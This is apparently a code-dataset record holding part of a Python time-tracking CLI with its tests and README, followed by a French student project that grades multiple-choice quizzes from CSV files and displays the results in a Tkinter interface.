task.stop(self.con)\n\n print(\"%s completed in %s\" % (task.name, task._pretty_elapsed_time()))\n\n paused_results = self._get_paused_tasks()\n for task in paused_results:\n response = input(\"Would you like to resume %s? [Y/n]:\" % (task.name))\n if response.lower() != 'n':\n task.start(self.con)\n \n task.toggle_pause(self.con)\n else:\n # There are no active results, so we should stop paused tasks.\n paused_results = self._get_paused_tasks()\n for task in paused_results:\n task.stop(self.con)\n\n if len(active_results) == 0 and len(paused_results) == 0:\n print('There aren\\'t any active or paused tasks.')\n\n def status(self):\n results = self._get_active_tasks()\n results = results + self._get_paused_tasks()\n\n if len(results) > 0:\n for task in results:\n if task.paused:\n paused = ' [Paused]'\n else:\n paused = ''\n \n print('%s (%s)%s' % (task.name, task._pretty_elapsed_time(), paused))\n else:\n print('There are no active tasks.')\n\n def close(self, sync=False):\n #This is where we would sync everything before we close\n self.con.close()" }, { "alpha_fraction": 0.5656565427780151, "alphanum_fraction": 0.5687645673751831, "avg_line_length": 33.81081008911133, "blob_id": "ea66e65c917d72ace39b130a9247821a28157aa7", "content_id": "4593363785f4583f308546664f230c547e4f1278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1287, "license_type": "no_license", "max_line_length": 75, "num_lines": 37, "path": "/timetracker/tests/test_actions.py", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "import unittest\nimport sys\n\nfrom timetracker.timetracker import TimeTracker\n\n\nclass TestActions(unittest.TestCase):\n def setUp(self):\n self.tt = TimeTracker(database_path=':memory:', project='test')\n\n def tearDown(self):\n pass\n\n def test_get_active_tests_no_tasks(self):\n tasks = self.tt._get_active_tasks()\n self.assertEqual(len(tasks), 0)\n\n def test_add_task(self):\n self.tt.start('test task')\n if not hasattr(sys.stdout, \"getvalue\"):\n self.fail(\"Please run in Buffer mode '--buffer'\")\n \n output = sys.stdout.getvalue().strip()\n self.assertEqual(output, 'Started test task')\n tasks = self.tt._get_active_tasks()\n self.assertIn('test task', [task.name for task in tasks])\n\n def test_stop_task(self):\n self.tt.start('test task')\n self.tt.stop()\n if not hasattr(sys.stdout, \"getvalue\"):\n self.fail(\"Please run in Buffer mode '--buffer'\")\n\n output = sys.stdout.getvalue().strip().split('\\n')[1]\n self.assertEqual(output, 'test task completed in 0 minutes')\n tasks = self.tt._get_active_tasks()\n self.assertEqual(len(tasks), 0)" }, { "alpha_fraction": 0.7240793108940125, "alphanum_fraction": 0.7274787425994873, "avg_line_length": 23.52777862548828, "blob_id": "d369d47a24e5e0887e8ec822b793ade2c872564c", "content_id": "8cbdd24523584cf191736ff8a1bc92633b25e68e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 305, "num_lines": 72, "path": "/README.rst", "repo_name": "ateoto/timetracker", "src_encoding": "UTF-8", "text": "TimeTracker\n===========\n\nTimeTracker (tt) is a python task management tool. Developed primarily out of my own needs as a consultant and a procrastinator.\n\nInstallation\n============\n\nUse pip to install TimeTracker into your virtualenv.\n\n.. code-block:: bash\n\n\t$ pip install -e https://github.com/Ateoto/timetracker.git\n\nUsage\n=====\n\nLets track our time in a project!\n\n.. code-block:: bash\n\n\t$ tt start \"Working on easing installation\"\n\nThat's it, TimeTracker is now tracking how long it's taken you to fix this broken install process.\n\nOk, I've fixed the install process (just for the sake of example).\nCommit the changes to your repo and then:\n\n.. code-block:: bash\n\t\n\t$ tt stop\n\t$ Working on easing installation completed. Elapsed Time: 20 minutes\n\nYou can also see a list of active tasks.\n\n.. code-block:: bash\n\n\t$ tt status\n\tNew task (0 minutes)\n\tOld task (2 minutes) [Paused]\n\n\nThere is a special case for pausing tasks, it flags the task in the database and the program will ask if you'd like to continue it after you stop your current task. TimeTracker will prompt you to pause active tasks if you try to start a new task with another task open. You can also manually pause a task.\n\n.. code-block:: bash\n\n\t$ tt status\n\tCurrent task (10 minutes)\n\t$ tt pause \"Current task\"\n\tPaused Current task\n\nThere is a lot more to come.\n\nTests\n=====\n\nThis is still a work in progress, but it is a top priority for me.\n\n.. code-block:: bash\n\n\t$ git clone https://github.com/Ateoto/timetracker.git\n\t$ cd timetracker\n\t$ python -m unittest discover\n\n\nFeatures\n========\n\n - Uses an sqlite database to keep track of active and closed tasks.\n - Simple implementation.\n - Simple API.\n - Coming Soon: Integration with a Django project to allow fine grained views on time management." } ]
5
Latrazil/projetCorrecteurQCM
https://github.com/Latrazil/projetCorrecteurQCM
871fff66409fca65b703be6a057159ad146a3468
32791c0d7a532e7405cfde872aa3744ffa1128b2
802b3a3073bd8409b3b56f1268cc7802a2cbcb8e
refs/heads/master
2022-11-14T15:20:20.755370
2020-07-13T12:56:55
2020-07-13T12:56:55
279,301,131
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6765533089637756, "alphanum_fraction": 0.6984278559684753, "avg_line_length": 60.00934600830078, "blob_id": "7cfa7a11b30d247b8767c99e340a072960e24a34", "content_id": "b0f8afe68ff51f833882b5ea08e8857a53acde78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 40342, "license_type": "no_license", "max_line_length": 290, "num_lines": 642, "path": "/Correcteur QCM - Copie/projetCorrecteur_avancé.py", "repo_name": "Latrazil/projetCorrecteurQCM", "src_encoding": "UTF-8", "text": "from tkinter import*#J'importe les modules dont j'aurais besoin\r\nimport operator as op#Je raccourcis operator en op \r\nimport math#J'importe math pour faire des opérations complexes\r\nlAlan = ['Alan','A','D','Z','C','C','B','Z','D']\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\ndef points(reponse,solution):\r\n \"\"\" Cette fonction permet d'atribuer les points aux élèves en fonction de leurs réponses \"\"\"\r\n if reponse==solution:#Je regarde si la solution est égale à la réponse de l'élève(réponse exacte), si oui je retourne 3\r\n return 3\r\n elif reponse!=solution:\r\n if reponse=='Z':#sinon je demande si la reponse est égale à Z(absence de réponse), si oui je retourne 0\r\n return 0\r\n else:# sinon, si la réponse est fausse, je retourne -1\r\n return -1\r\n \r\n\r\ndef corrige (lrep,lsol):\r\n \"\"\" Cette fonction retourne une liste avec les points des élèves et leurs prénoms \"\"\"\r\n # en tout premier je crée une liste vide dans laquelle je vais mettre mon résultat\r\n resultat = []\r\n # ensuite j'y ajoute le prénom de l'élève\r\n resultat.append(lrep[0])\r\n for i in range(1,len(lrep)): # je parcours le reste de ma liste\r\n reponse = lrep[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de reponses de l'élève à une variable reponse\r\n solution = lsol[i]#J'attribue l'élément à la position i à l'intérieur de ma liste de solution à une variable solution\r\n score = points(reponse,solution)#J'attribue ce que retourne la fonction points à une variable score que j'insers ensuite à résultat\r\n resultat.append(score)\r\n return resultat# Je retourne résultat\r\n\r\nl=['Alan',3,-1,0,3,3,3,0,3]\r\ndef note (lpoints):\r\n \"\"\" Cette fonction renvoie la note totale à l'aide des points \"\"\"\r\n somme=0#J'initialise une variable somme à zéro qui sera ma note\r\n for i in range(1,len(lpoints)):# Je parcours ma liste en excluant le prénom\r\n somme+=lpoints[i]#J'additionne à somme les points à l'index i de ma liste de points\r\n return somme#Je retourne somme soit la note\r\n\r\ndef reponseFausse(lpoints):\r\n \"\"\" Cette fonction retourne la liste des index des réponses fausses \"\"\"\r\n rf=[]#J'initialise une liste vide nommée rf pour Réponses Fausses\r\n rf.append(lpoints[0])#J'y ajoute le prénom de l'élève\r\n for i in range(1,len(lpoints)):#Je parcours le reste de la liste de points\r\n if lpoints[i]!=3:#Si le point à l'index i n'est pas égale à 3, une bonne réponse, alors on ajoute l'index i à la liste rf\r\n rf.append(i)\r\n return rf # Je retourne la liste des réponses fausses\r\n\r\n\r\n# partie 2\r\n\r\ngrille = [ ['Alan','A','D','Z','C','C','B','Z','D'] ,\r\n ['Ada','B','D','B','C','Z','B','Z','A'] ,\r\n ['Hedy','B','D','B','C','Z','B','Z','Z'] ]\r\nlsolution = ['solution','A','A','C','C','C','B','C','D']\r\n\r\ndef corrigeGrille(grillerep,lsol):\r\n \"\"\" Cette fonction corrige une grille(au lieu d'une liste seule)et retourne une grille corrigée avec les points attribués pour chaque élève \"\"\"\r\n grille2=[0]*len(grillerep)#J'initialise une liste de la longueur de la grille de réponses\r\n for i in range(len(grillerep)):#Je parcours ma liste\r\n grille2[i]=corrige(grillerep[i],lsol)#J'assigne à l'index de la liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction corrige(à partir de l'index de la grille de réponses, soit la liste de réponse de l'élève,\r\n #et de la liste de solutions) qui retourne la liste des points marqués par question\r\n return grille2# Je retourne la deuxième grille\r\n\r\ng= [ ['Alan', 3,-1,0,3,3,3,0,3] ,\r\n ['Ada', -1,-1,-1,3,0,3,0,-1] ,\r\n ['Hedy', -1,-1,-1,3,0,3,0,0] ]\r\n\r\ndef noteGrille(grillepoints):\r\n \"\"\" Cette fonction additionne une liste à l'intérieur d'une grille de points pour retourner une grille avec la note par élève \"\"\"\r\n grille3=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for x in range(len(grillepoints)):#Je parcours ma liste\r\n grille3[x]=[0]*2#J'insère une liste de deux occurences pour créer une grille\r\n for i in range(len(grillepoints)):#Je parcours ma grille\r\n for j in range(len(grillepoints[i])):\r\n if j==0:#Je mets le prénom en début de grille3[i] car grillepoints[i][0], grillepoints[i][j] dans cette situation, est l'emplacement du prénom de l'élève \r\n grille3[i][0]=grillepoints[i][j]\r\n else:#Je mets la note en deuxième position, note que je calcule avec la fonction note appliquée à la liste grillepoints[i]\r\n grille3[i][1]=note(grillepoints[i])\r\n return grille3 # Je retourne grille 3 soit la grille avec le prénom et la note des élèves\r\n\r\ndef reponseFausseGrille (grillepoints):\r\n \"\"\" Cette fonction renvoie une grille avec les réponses fausses des élèves \"\"\"\r\n grille4=[0]*len(grillepoints)#Je crée une liste de la taille de la grille de points\r\n for i in range(len(grillepoints)):#Je parcours ma liste\r\n grille4[i]=reponseFausse(grillepoints[i])#J'assigne à l'index de la deuxième liste une nouvelle liste pour en faire une grille\r\n #faite à partir de la fonction reponseFausse de l'index de la grille de points\r\n #qui retourne la liste des index de réponses fausses des élèves\r\n return grille4 # Je retourne grille4 soit la grille avec le prénom de l'élève et l'index de ses réponses fausses\r\n\r\ndef somGrille(grillepoints):\r\n \"\"\" Cette fonction additionne le total des points des élèves pour chacune des questions \"\"\"\r\n listeSom=[]#Je crée une liste vide qui contiendra le total des points des élèves\r\n listeSom.append('somme')#J'ajoute somme au début de la liste\r\n sommeGrille=0#J'initialise une variable à zéro\r\n for j in range(1,len(grillepoints[0])):#Je parcours la liste dans la grille, pour traiter la question j, en excluant le prénom et j'utilise la longueur de grillepoints[0] car les listes ont toutes la même longueur\r\n for i in range(len(grillepoints)):#Je parcours ensuite la grille pour lire les points de chaque élève pour cette question\r\n sommeGrille+=grillepoints[i][j]#J'additionne à la variable les points de la question\r\n listeSom.append(sommeGrille)#J'insere mon ajout(sommeGrille) dans la liste que j'avais initialisée au début\r\n sommeGrille=0#Je remets la variable à zéro pour traiter la question suivante \r\n return listeSom # Je retourne la liste\r\n\r\ngrilleNote = [ ['Alan', 14] , ['Ada', 2] , ['Hedy', 3] ]\r\n\r\ndef meilleurResultat(grillerep) :\r\n \"\"\" Cette fonction donne le nom de l'élève avec le meilleur résultat \"\"\"\r\n mr=grillerep[0][0]# J'initialise avec le nom du premier élève\r\n mrc=grillerep[0][1]#J'initialise à la note du premier élève\r\n for i in range(1,len(grillerep)):#Je parcours ma grille pour chaque élève excluant le premier\r\n if mrc<grillerep[i][1]:# Si la variable mrc(meilleur résultat chiffre) est inférieure à la note de cet.te élève alors :\r\n mrc=grillerep[i][1]#Je remplace la variable mrc avec la note\r\n mr=grillerep[i][0]# Et je remplace le nom de l'élève ayant eu le meilleur résultat \r\n return mr # A la fin je retourne le nom de l'élève ayant eu la meilleure note\r\n\r\n# partie 3 fichier\r\n# Pensez à mettre reponse.csv et réponseQCM.csv dans le même répertoire que votre programme.\r\nimport csv\r\ndef lireSolutionCSV():\r\n \"\"\" Cette fonction lit le fichier solution et renvoie une liste avec la solution \"\"\"\r\n sol=[]#Je déclare une variable sol qui contiendra la solution des réponses\r\n monFichierSol=open('solution.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierSol, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for ligne in contenu:#Je parcours le contenu\r\n sol=ligne#Je j'ajoute la l'ensemble des solutions dans sol\r\n monFichierSol.close()#Je ferme mon fichier\r\n return sol # Je retourne une liste avec la solution\r\n\r\ndef lireCSV() :\r\n \"\"\" Cette fonction lit les réponses puis renvoie une grille avec le prénom et les réponses qui se trouvaient dans le fichier \"\"\"\r\n rep=[]#Je déclare une variable rep qui contiendra les réponses des éléves\r\n monFichierRep=open('reponseQCM.csv')#J'ouvre mon fichier\r\n contenu=csv.reader(monFichierRep, delimiter=\";\")#Je place le contenu du fichier que je lis dans une variable\r\n for lignes in contenu:#Je parcours le contenu\r\n rep.append(lignes)#Je j'ajoute toutes les lignes dans rep\r\n monFichierRep.close()#Je ferme mon fichier\r\n return rep # Je retourne le contenu du fichier\r\n\r\ndef ecritureCSV():\r\n \"\"\" Cette fonction écrit dans le fichier noteQCM le prénom et la note de l'élève et retourne la liste avec le prénom et la note de l'élève \"\"\"\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#J'attribue à la variable \"corriger\" la grille résultant de la fonction corrigeGrille, utilisée sur les données renvoyées par les fonctions lireCSV et lireSolutionCSV, soit une grille corigée\r\n notePrenom=noteGrille(corriger)#Je note ensuite cette grille avec la fonction noteGrille qui me renvoie une grille avec le prénom et la note de chaque élève\r\n monFichierNote=open('noteQCM.csv',\"w\")#J'ouvre en mode écriture mon fichier noteQCM\r\n for i in range(len(notePrenom)):#Je parcours ma liste et j'écris le prénom et la note, séparés d'un point virgule et ensuite j'écris un saut de ligne. \r\n monFichierNote.write(str(notePrenom[i][0]))\r\n monFichierNote.write(';')\r\n monFichierNote.write(str(notePrenom[i][1]))\r\n monFichierNote.write('\\n')\r\n monFichierNote.close()#Je ferme mon fichier\r\n return notePrenom# Je retourne la liste des notes\r\n\r\n#partie4 Tkinter\r\n\r\ndef Accueil():\r\n \"\"\"\" Cette fonction permet d'afficher l'accueil \"\"\"\r\n Detruire()#Je désaffiche les widgets à l'écran avec la fonction détruire, ce que je ferais pour chacune des fonction suivantes\r\n\r\n Label1.config(text=\"Accueil\",font=('System', '40', 'italic bold'),width='15')#Je configure le label1 pour qu'il affiche \"Accueil\" en police de caractère system, taille 40, et en italic gras avec une taille de 15 caractères\r\n\r\n Label1.grid(column=2,row=1,padx=20, pady=20)#Je l'affiche.\r\n\r\n Entree.config(font=('System', '1'))\r\n Entree2.config(font=('System', '1'))#Je configure la police de caractères des zones de saisie et des boutons\r\n\r\n Bouton.config(font=('System', '1'))\r\n Bouton2.config(font=('System', '1'))\r\n \r\n Entree.grid(column=0,row=2,padx=20, pady=20)# Je les affiche\r\n Bouton.grid(column=1, row=2, padx=20, pady=20)\r\n\r\n Entree2.grid(column=0,row=3, padx=20, pady=20)\r\n Bouton2.grid(column=1, row=3, padx=20, pady=20)\r\n return\r\n\r\ndef VoirNotesEleves():\r\n \"\"\" Cette fonction permet d'afficher les notes des élèves \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)#J'efface ce qu'il y avait sur les canvas\r\n Canevas2.delete(ALL)\r\n Canevas3.delete(ALL)\r\n VoirNotesEleves1()#J'appelle les trois fonctions décrites plus bas\r\n VoirNotesEleves2()\r\n VoirNotesEleves3()\r\n return\r\n\r\ndef VoirNotesEleves1():\r\n \"\"\" Cette fonction permet d'afficher les notes dans l'ordre alphabétique \"\"\"\r\n Label1.config(text=\"Les notes et prénoms triés selon l'ordre alphabétique\",font=('System', '1'), width='45')#Je configure mon label et je l'affiche\r\n Label1.grid(column=0,row=1)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n Notes=noteGrille(corriger)\r\n Canevas.config(width=((fen.winfo_width())/3)-5, height=fen.winfo_height(),scrollregion=(0, 0,(len(Notes)*15)+100 , (len(Notes)*15)+100))#Je configure la taille de mon Canevas et la zone de déplacement pour la barre \r\n Canevas.grid(column=0,row=2,padx=1, pady=2)#J'affiche mon Canevas\r\n for i in range(len(Notes)):\r\n Canevas.create_text(35,(3+i)*15, text=Notes[i][0], justify='left', anchor='sw',font=('System', '1'))#J'affiche le prénom, puis :, puis la note dans le Canevas\r\n Canevas.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n Canevas.create_text(165,(3+i)*15, text=Notes[i][1], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil.config(orient='vertical', command=Canevas.yview)#Je configure ma barre de défilement en l'orientant verticalement et je lui attribue les ordonnées du Canvas pour qu'elle puisse les faire défiler\r\n BarreDefil.grid(column=1, row=2, sticky='ns')#Je l'affiche\r\n Canevas['yscrollcommand'] = BarreDefil.set#J'attribue à la commande yscrool du Canevas la barre de défilement pour lui permettre de défiler\r\n return\r\n\r\ndef VoirNotesEleves2():\r\n \"\"\" Cette fonction permet d'afficher les note dans l'ordre décroissant, elle est globalement pareil à la première sauf sur un point \"\"\"\r\n Label2.config(text=\"Les notes et prénoms triés selon l'ordre decroissant des notes\",font=('System', '1'))\r\n Label2.grid(column=2,row=1)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1), reverse=True)# Je trie ma grille selon la deuxième occurence de la liste à l'intérieur de la grille(la note) grace à la fonction itemgetter d'operator puis j'inverse la grille, soit l'ordre décroissant des notes\r\n Canevas2.config(width=fen.winfo_width()/3-5, height=fen.winfo_height(),scrollregion=(0, 0,(len(Notes)*15)+100 , (len(Notes)*15)+100))\r\n Canevas2.grid(column=2,row=2,padx=1, pady=2)\r\n for i in range(len(Notes)):\r\n Canevas2.create_text(35,(3+i)*15, text=Notes[i][0], justify='left', anchor='sw',font=('System', '1'))\r\n Canevas2.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n Canevas2.create_text(165,(3+i)*15, text=Notes[i][1], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil2.config(orient='vertical', command=Canevas2.yview)\r\n BarreDefil2.grid(column=3, row=2, sticky='ns')\r\n Canevas2['yscrollcommand'] = BarreDefil2.set\r\n return\r\n\r\ndef VoirNotesEleves3():\r\n \"\"\" Cette fonction permet d'afficher les note dans l'ordre croissant, elle est globalement pareil à la première sauf sur un point \"\"\"\r\n Label3.config(text=\"Les notes et prénoms triés selon l'ordre croissant des notes\",font=('System', '1'))\r\n Label3.grid(column=4,row=1)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1))# Je trie ma grille selon la deuxième occurence(la note) grace à la fonction itemgetter d'operator soit dans l'ordre croissant des notes\r\n Canevas3.config(width=((fen.winfo_width())/3)-75, height=fen.winfo_height(),scrollregion=(0, 0,(len(Notes)*15)+100 , (len(Notes)*15)+100))\r\n Canevas3.grid(column=4,row=2,padx=1, pady=2)\r\n for i in range(len(Notes)):\r\n Canevas3.create_text(35,(3+i)*15, text=Notes[i][0], justify='left', anchor='sw',font=('System', '1'))\r\n Canevas3.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n Canevas3.create_text(165,(3+i)*15, text=Notes[i][1], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil3.config(orient='vertical', command=Canevas3.yview)\r\n BarreDefil3.grid(column=5, row=2, sticky='ns')\r\n Canevas3['yscrollcommand'] = BarreDefil3.set\r\n return\r\n\r\ndef EleveMeilleur():\r\n \"\"\" Cette fonction permet de savoir le meilleur élève ainsi que sa note \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)#J'efface le contenu de Canevas\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1),reverse=True)#Je vais la même chose que dans VoirNotesEleves2 pour avoir la note correspondante au meilleur résultat\r\n meilleurEleve=meilleurResultat(Notes)#J'utilise la fonction meilleurResultat pour déterminer le nom de l'élève ayant eut le meilleur résultat\r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height())#Je configure mon Canevas pour lui donner la taille de la fenêtre\r\n Canevas.grid(column=0,row=1)#J'affiche mon Canevas\r\n Canevas.create_text(fen.winfo_width()/2,fen.winfo_height()/2, text=\"Bravo à : \"+str(meilleurEleve)+\" qui a obtenu une note de : \"+str(Notes[0][1]), font=('System', '40', 'italic bold'), fill='orange')\r\n #J'écris dans le Canevas une chaine caractère comprenant le nom de l'élève et sa note qui est la seconde occurence du début de la liste triée selon l'ordre décroissant de la note\r\n return\r\n\r\ndef ElevePire():\r\n \"\"\" Cette fonction permet de savoir quel élève a eut le moins bon score et sa note, elle est globalement semblable à EleveMeilleur mais possède certaines différences \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)#J'efface le contenu de Canevas\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n Notes=noteGrille(corriger)\r\n Notes.sort(key=op.itemgetter(1))#Je fais la même chose que dans VoirNotesEleves3 pour avoir la note et le prénom correspondante au pire résultat\r\n pireEleve=Notes[0][0]#J'attribue le prénom de l'élève ayant le pire résultat qui est la première occurence de la liste croissante de notes\r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height())\r\n Canevas.grid(column=0,row=1)\r\n Canevas.create_text(fen.winfo_width()/2,fen.winfo_height()/2, text=str(pireEleve)+\" a obtenu une note de : \"+str(Notes[0][1]), font=('System', '40','italic bold'), fill='blue')\r\n #J'écris dans le Canevas une chaine caractère comprenant le nom de l'élève et sa note qui est la seconde occurence du début de la liste triée selon l'ordre croissant de la note\r\n return\r\n\r\ndef VoirReponsesEleves():\r\n \"\"\" Cette fonction permet de voir les réponses proposées par les élèves \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Label3.config(text=\"Les réponses des élèves\",font=('System', '1'))\r\n Label3.grid(column=2,row=1)\r\n Reponse=lireCSV()#J'utilise lireCSV pour avoir une grille avec les prénoms et les réponses des élèves\r\n Canevas.config(width=((fen.winfo_width())/2), height=fen.winfo_height(),scrollregion=(0, 0,(len(Reponse)*15)+100 , (len(Reponse)*15)+100))\r\n Canevas.grid(column=2,row=2,padx=20, pady=2)\r\n for i in range(len(Reponse)):#Je parcours ma grille\r\n Canevas.create_text(35,(3+i)*15, text=Reponse[i][0], justify='left', anchor='sw',font=('System', '1'))#Je mets en premier le prénom de l'élève, qui n'occura qu'une fois par parcours de grille\r\n Canevas.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))#Je mets le : pour séparer les réponses du prénom de l'élève\r\n for j in range(1,len(Reponse[i])):#Je parcours le reste des réponses en excluant le prénom\r\n Canevas.create_text(120+10*j,(3+i)*15, text=Reponse[i][j], justify='left', anchor='sw',font=('System', '1'))#J'écris les réponses des élèves dans le Canevas\r\n BarreDefil.config(orient='vertical', command=Canevas.yview)\r\n BarreDefil.grid(column=3, row=2, sticky='ns')\r\n Canevas['yscrollcommand'] = BarreDefil.set\r\n return\r\n\r\ndef VoirReponsesFausses():\r\n \"\"\" Cette focntion permet de voir les numéros des questions auxquelles les élèves ont répondu faux, elle est semblable dans la forme à la fonction précedente \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Label3.config(text=\"Les réponses fausses des élèves\")\r\n Label3.grid(column=1,row=1)\r\n ReponseFausse=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n ReponseFausse=reponseFausseGrille(ReponseFausse)#J'utlise la fonction reponseFausseGrille sur ma grille pour avoir l'index des réponses fausses\r\n Canevas.config(width=((fen.winfo_width())/2), height=fen.winfo_height(),scrollregion=(0, 0,(len(ReponseFausse)*15)+100 , (len(ReponseFausse)*15)+100))\r\n Canevas.grid(column=1,row=2,padx=20, pady=2)\r\n for i in range(len(ReponseFausse)):\r\n Canevas.create_text(35,(3+i)*15, text=ReponseFausse[i][0], justify='left', anchor='sw',font=('System', '1'))#Cette partie est similaire à la fonction du dessus à part que ceux sont l'index des réponses fausses qui sont mises et non les réponses des élèves\r\n Canevas.create_text(120,(3+i)*15, text=\":\", justify='left', anchor='sw',font=('System', '1'))\r\n for j in range(1,len(ReponseFausse[i])):\r\n Canevas.create_text(120+10*j,(3+i)*15, text=ReponseFausse[i][j], justify='left', anchor='sw',font=('System', '1'))\r\n BarreDefil.config(orient='vertical', command=Canevas.yview)\r\n BarreDefil.grid(column=2, row=2, sticky='ns')\r\n Canevas['yscrollcommand'] = BarreDefil.set\r\n return\r\n\r\ndef VoirReponsesOrdreReusite():\r\n \"\"\" Cette fonction permet de voir l'ordre de réussite des question du questionnaire \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n ReponseFausse=corrigeGrille(lireCSV(),lireSolutionCSV())#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n OrdreReusite=somGrille(ReponseFausse)#J'additionne les points des eleves grace à la fonction somGrille\r\n for i in range(len(OrdreReusite)):#Je parcours ma liste\r\n if i!=0:#J'exclue somme\r\n OrdreReusite[i]=[i,int(OrdreReusite[i])]#Je met le numero des questions devant les resultats de somGrille\r\n OrdreReusite.remove('somme')#J'enlève somme\r\n OrdreReusite.sort(key=op.itemgetter(1))#Je trie ma grille selon la deuxième occurence\r\n Canevas.create_text(20,fen.winfo_height()/2, text=\"Les questions des moins au plus réussies : \", justify='left', anchor='sw',font=('System', '25'))\r\n for i in range(len(OrdreReusite)):#Je parcours ma grille\r\n Canevas.create_text(fen.winfo_width()/2-75+i*70,fen.winfo_height()/2, text=str(OrdreReusite[i][0])+\"|\", justify='left', anchor='sw',font=('System', '27'))#Je mets les question des moins au plus réussies\r\n Canevas.config(height=fen.winfo_height(),width=fen.winfo_width())\r\n Canevas.grid(column=0, row=1)\r\n return\r\n\r\ndef VoirSolution():\r\n \"\"\" Cette fonction permet de voir la solution des questions du questionnaire \"\"\"\r\n Detruire()\r\n Canevas.delete(ALL)\r\n Label3.config(text=\"La solution\")\r\n Label3.grid(column=1,row=1)\r\n Solution1=lireSolutionCSV()#Je recupère une liste Solution1 grace à la fonction lireSolutionCSV\r\n Solution1.insert(1,':')#J'insert un : à la deuxième occurence, soit juste après \"solution\"\r\n Solution1=\" \".join(Solution1)#Je transforme ma liste en chaine de caractères séparés par un espace\r\n Canevas.config(width=fen.winfo_width(), height=fen.winfo_height())\r\n Canevas.grid(column=0,row=1)\r\n Canevas.create_text(fen.winfo_width()/2,fen.winfo_height()/2, text=str(Solution1), font=('System', 30))#J'affiche ma chaine de caractère sur le Canevas\r\n return\r\n\r\ndef rechercher():\r\n \"\"\"Cette fonction permet de rechercher la note avec le prénom d'un élève\"\"\"\r\n Canevas.delete(ALL)\r\n Canevas.config(width=fen.winfo_width()/2, height=fen.winfo_height()/4)\r\n Canevas.grid(column=2,row=2,padx=20, pady=20)\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n longueur=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n for i in range(len(longueur)):#Je parcours ma grille\r\n if longueur[i][0]==recherche.get():#Si le prénom, soit la première ocurence de la liste dans la grille, est le même que celui recherché alors j'affiche le prénom et la note soit la deuxième occurence \r\n Canevas.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=str(longueur[i][0])+' a une note de '+str(longueur[i][1]),font=('System', 30))\r\n return#Je ferme la fonction\r\n Canevas.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text=recherche.get()+' n\\'existe pas',font=('System', 30))#Sinon si il n'y a pas de prénom correspondant je dis que le prénom n'existe pas\r\n return\r\n\r\ndef rechercher2():\r\n \"\"\"Cette fonction permet de rechercher les prénoms d'élèves à partir de la note\"\"\"\r\n Canevas2.delete(ALL)\r\n nombre=0#J'initialise une variable nombre à zéro\r\n corriger=corrigeGrille(lireCSV(),lireSolutionCSV())\r\n longueur=noteGrille(corriger)#Je fais la même chose que dans ecritureCSV pour avoir une grille de notes et prénoms \r\n for i in range(len(longueur)):#Je parcours ma grille\r\n if str(longueur[i][1])==recherche2.get():#Si la deuxième occurence soit la note est égale à la note recherchée alors j'affiche les prénoms liés à cette note\r\n Canevas2.create_text(fen.winfo_width()/4,(nombre+3)*15,text=str(longueur[i][0]), justify='left', anchor='sw',font=('System', '1'))\r\n nombre=nombre+1#J'additionne un à \"nombre\" pour que ce dernier soit au dessus de zéro, cela me renseigne si il y a bien une occurence au moins, je compte aussi ainsi le nombre d'élèves\r\n if nombre==0:#Si il n'y pas d'occurence, je dis que la note n'existe pas\r\n Canevas2.create_text(fen.winfo_width()/4,fen.winfo_height()/8,text='Cette note n\\'existe pas',font=('System', 30))\r\n else:#Sinon je dis le nombre d'élève ayant eu cette note\r\n Canevas2.create_text(fen.winfo_width()/6,45,text=str(nombre)+' élèves ont une note de '+str(recherche2.get())+ \" : \" ,font=('System', 10))\r\n BarreDefil2.config(orient='vertical', command=Canevas2.yview)\r\n BarreDefil2.grid(column=3, row=3, sticky='ns')\r\n Canevas2['yscrollcommand'] = BarreDefil2.set\r\n\r\n Canevas2.config(width=fen.winfo_width()/2, height=fen.winfo_height()/4,scrollregion=(0, 0,(nombre*15)+100 , (nombre*15)+100))\r\n 